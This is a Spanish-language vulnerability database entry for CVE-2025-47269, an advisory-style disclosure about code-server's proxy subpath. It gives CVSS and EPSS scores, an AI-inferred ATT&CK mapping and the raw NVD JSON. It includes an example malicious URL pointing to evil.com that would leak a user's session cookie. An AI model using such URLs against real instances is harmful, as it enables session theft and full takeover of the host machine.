CVE-2025-47269
code-server runs VS Code on any machine anywhere through browser access. Prior to version 4.99.4, a maliciously crafted URL using the proxy subpath can result in the attacker gaining access to the session token. Failure to properly validate the port for a proxy request can result in proxying to an arbitrary domain. The malicious URL `https://<code-server>/proxy/test@evil.com/path` would be proxied to `test@evil.com/path` where the attacker could exfiltrate a user's session token.
Leer descripción completaMostrar menos
Any user who runs code-server with the built-in proxy enabled and clicks on maliciously crafted links that go to their code-server instances with reference to /proxy. Normally this is used to proxy local ports, however the URL can reference the attacker's domain instead, and the connection is then proxied to that domain, which will include sending cookies. With access to the session cookie, the attacker can then log into code-server and have full access to the machine hosting code-server as the user running code-server. This issue has been patched in version 4.99.4.
CVSS
- Versión: 3.1
- Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L
- Puntuación base: 8.3
Probabilidad de explotación (EPSS)
- Probabilidad de explotación en los próximos 30 días: 43%
- Percentil entre todas las CVEs puntuadas: 99
- Fecha de la puntuación: 6/10/2026
EPSS (Exploit Prediction Scoring System, de FIRST) estima la probabilidad de que una vulnerabilidad sea explotada en 30 días. Complementa a CVSS (impacto) y a CISA KEV (explotación confirmada).
🎯 Técnicas ATT&CK
Cómo se explota esta vulnerabilidad y qué consigue el atacante, en el lenguaje de MITRE ATT&CK.
- Explotación
T1203Exploitation for Client Executionexecution85 % - Impacto principal
T1212Exploitation for Credential Accesscredential access90 % - Impacto secundario
T1005Data from Local Systemcollection75 % - Impacto secundario
T1078.001Default Accountsstealth · persistence · privilege escalation · initial access85 %
UI:R indica interacción del usuario (clic en enlace malicioso). El atacante exfiltра session token (T1212) mediante validación deficiente del proxy, permitiendo posterior autenticación (T1078.001) y acceso a datos locales (T1005).
Inferido por nuestro agente de análisis a partir de la descripción oficial, el vector CVSS y la CWE, y comprobado por un supervisor. Puede contener errores.
🛡️ Mitigaciones ATT&CK que cubren estas técnicas
Tecnologías afectadas (1)
⚠ Inferidas por IA a partir de la descripción — NVD aún no ha analizado esta CVE; no son CPE verificados.
CWE
- CWE-441
Referencias
JSON original (NVD)
Mostrar
{
"id": "CVE-2025-47269",
"cveTags": [],
"metrics": {
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2025-47269",
"role": "CISA Coordinator",
"options": [
{
"exploitation": "none"
},
{
"automatable": "no"
},
{
"technicalImpact": "total"
}
],
"version": "2.0.3",
"timestamp": "2025-05-10T01:44:34.818502Z"
}
}
],
"cvssMetricV31": [
{
"type": "Secondary",
"source": "security-advisories@github.com",
"cvssData": {
"scope": "UNCHANGED",
"version": "3.1",
"baseScore": 8.3,
"attackVector": "NETWORK",
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L",
"integrityImpact": "HIGH",
"userInteraction": "REQUIRED",
"attackComplexity": "LOW",
"availabilityImpact": "LOW",
"privilegesRequired": "NONE",
"confidentialityImpact": "HIGH"
},
"impactScore": 5.5,
"exploitabilityScore": 2.8
}
]
},
"affected": [
{
"source": "security-advisories@github.com",
"affectedData": [
{
"vendor": "coder",
"product": "code-server",
"versions": [
{
"status": "affected",
"version": "< 4.99.4"
}
]
}
]
}
],
"published": "2025-05-09T21:15:51.263",
"references": [
{
"url": "https://github.com/coder/code-server/commit/47d6d3ada5aadef6d221f3d612401eb3dad9299e",
"source": "security-advisories@github.com"
},
{
"url": "https://github.com/coder/code-server/releases/tag/v4.99.4",
"source": "security-advisories@github.com"
},
{
"url": "https://github.com/coder/code-server/security/advisories/GHSA-p483-wpfp-42cj",
"source": "security-advisories@github.com"
}
],
"vulnStatus": "Deferred",
"weaknesses": [
{
"type": "Secondary",
"source": "security-advisories@github.com",
"description": [
{
"lang": "en",
"value": "CWE-441"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "code-server runs VS Code on any machine anywhere through browser access. Prior to version 4.99.4, a maliciously crafted URL using the proxy subpath can result in the attacker gaining access to the session token. Failure to properly validate the port for a proxy request can result in proxying to an arbitrary domain. The malicious URL `https://<code-server>/proxy/test@evil.com/path` would be proxied to `test@evil.com/path` where the attacker could exfiltrate a user's session token. Any user who runs code-server with the built-in proxy enabled and clicks on maliciously crafted links that go to their code-server instances with reference to /proxy. Normally this is used to proxy local ports, however the URL can reference the attacker's domain instead, and the connection is then proxied to that domain, which will include sending cookies. With access to the session cookie, the attacker can then log into code-server and have full access to the machine hosting code-server as the user running code-server. This issue has been patched in version 4.99.4."
},
{
"lang": "es",
"value": "Code-server ejecuta VS Code en cualquier máquina, desde cualquier lugar, mediante acceso al navegador. Antes de la versión 4.99.4, una URL maliciosa que usara la subruta del proxy podía permitir que un atacante obtuviera acceso al token de sesión. Si no se valida correctamente el puerto para una solicitud de proxy, se puede redirigir a un dominio arbitrario. La URL maliciosa «https:///proxy/test@evil.com/path» se redirigía a «test@evil.com/path», donde el atacante podría extraer el token de sesión de un usuario. Cualquier usuario que ejecute Code-server con el proxy integrado habilitado haga clic en enlaces maliciosos que dirijan a sus instancias de Code-server con referencia a /proxy. Normalmente, esto se utiliza para redirigir puertos locales; sin embargo, la URL puede hacer referencia al dominio del atacante, y la conexión se redirige a ese dominio, lo que incluye el envío de cookies. Con acceso a la cookie de sesión, el atacante puede iniciar sesión en el servidor de código y tener acceso completo a la máquina que lo aloja como el usuario que lo ejecuta. Este problema se ha corregido en la versión 4.99.4."
}
],
"lastModified": "2026-06-17T09:27:38.423",
"sourceIdentifier": "security-advisories@github.com"
}